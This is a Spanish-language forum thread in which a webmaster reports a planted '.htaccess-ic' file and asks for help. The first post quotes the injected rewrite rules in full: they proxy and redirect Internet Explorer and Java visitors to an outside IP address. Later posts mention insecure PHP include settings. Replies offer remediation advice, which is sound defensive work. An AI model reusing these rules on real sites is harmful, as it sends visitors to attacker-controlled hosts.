.htaccess-ic ataque de redireccion..

eybel · #1 (**permalink**) 15/03/2012, 09:49

Bueno primera vez que me pasa esto. Me aparecio en el hosting un archivos llamado ".htaccess-ic" que tenia el siguiente codigo..

Código PHP:

  RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE [OR]

RewriteCond %{HTTP_USER_AGENT} Java

RewriteRule Index/(.*) http://109.236.81.64/$1 [P,L]

 
<FilesMatch "\.(html|htm|php|shtml|asp|aspx|jsp)$">

RewriteEngine On

##

RewriteCond %{HTTP_COOKIE} !^.*client.*$

RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE

RewriteRule .* http://%{HTTP_HOST}/Index/index.php [R,L]

##

Header set Set-Cookie: "client=done;path=/;"

</FilesMatch>

El cual me hizo desaparecer el "header" y "footer" de toda la web. Esto fue puesto a las 3am. Lo elimine y se arreglo el problema, creo que no le funciono totalmente a esta persona porque por lo que lei, esto tendria que haber redireccionado la web completamente a otra web pero solo la hizo funcionar mal. Eliminando los "includes".

Este ataque fue atravez de un "backdoor" .

Como paso esto? y como puedo prevenirlo?

Gracias

JoshMex · #2 (**permalink**) 15/03/2012, 13:33

Cambia inmediatamente el password de tu cuentas ftp, verifica que tu pc no esté infectado por un spyware o troyano, no almacenes en los clientes ftp los password de su sitios, existen muchos virus que los roban y luego los hackers los usan para infectar tu web con scripts

Usas joomla, wordpress u otro script de este tipo en tu sitio?, es probable que también esté aprovechando alguna vulnerabilidad del script para infectar tus archivos.

Datacenter1 · #3 (**permalink**) 15/03/2012, 15:26

Hace un tiempo atrás escribí esto que puede ayudar http://www.forosdelweb.com/f57/ataques-htaccess-965789/

eybel · #4 (**permalink**) 15/03/2012, 21:05

Borre ese archivo y me volvio a aparecer, esta web tiene muchas paginas .html y muy pocas en php el include que tiene ese un include de html no mas.

Voy a cambiar el FTP pero la verdad que no creo que sea eso, porque si no me hubieran borralo el .htaccess pero solo pusieron un .htaccess-ic . Es la 2da vez en el mismo dia.

El unico cambio fue en mi php.ini porque mi servidor no permitia "includes".
Entonces me dijeron que para permitirlo tenia que crear un archivo "php.ini" y poner esto:

allow_url_include = 1
allow_fopen_url = 1

Voy a leer esas ayudas gracias.

cincinnati · #5 (**permalink**) 16/03/2012, 02:06

Cita:

pero la verdad que no creo que sea eso

Casi seguro que SÍ es eso. Pero además de cambiar la contraseña de tu FTP, analiza también tu PC en búsqueda de troyanos, virus y demás habitantes maliciosos pues suele ser de ahí de donde "pillan" la contraseña de tu FTP.

eybel · #6 (**permalink**) 16/03/2012, 09:00

Ya lo hice, igualmente tengo la computadora limpia con un buen antivirus pago. Como dije antes si ellos tubieran la contrasena, harian mas dano, hubieran editado el .htaccess en vez de agregar otro.. Yo creo que hay un "backdoor" al habilitar "allow_url_include" y "allow_fopen_url" porque ya lei en varios blogs que hay ataques de .htaccess cuando estos estan habilitados..

Alguna otra idea para usar "includes" con php cuando estos estan deshabilitados?

gracias por la ayuda...

Datacenter1 · #7 (**permalink**) 16/03/2012, 09:45

Verifica los logs de acceso de FTP y saldrás de dudas si es por ftp que lo están haciendo

Hay una forma de hacer los includes con curl pero no soy programador alguien con más experiencia en esa área podrá ayudarte mejor